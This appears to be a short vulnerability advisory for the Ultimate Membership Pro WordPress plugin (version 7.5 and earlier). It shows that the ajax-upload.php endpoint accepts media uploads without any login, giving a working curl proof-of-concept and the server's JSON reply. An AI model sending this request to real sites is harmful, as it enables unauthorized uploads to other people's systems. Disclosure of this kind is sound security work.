indeed-membership-pro (Ultimate Membership Pro) <=7.5 arbitrary media upload

  exploits
Description
The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do: Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you: ~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php {"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"} Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.